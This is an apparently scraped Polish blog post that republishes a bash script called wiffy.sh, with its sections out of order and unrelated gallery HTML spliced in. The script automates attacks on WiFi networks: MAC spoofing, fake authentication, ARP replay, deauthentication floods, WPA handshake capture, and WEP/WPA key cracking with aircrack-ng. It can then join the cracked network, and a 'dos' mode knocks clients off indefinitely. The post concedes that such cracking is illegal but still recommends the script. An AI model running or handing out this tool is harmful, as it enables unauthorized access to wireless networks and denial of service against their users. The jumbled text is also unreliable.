mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0009.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; 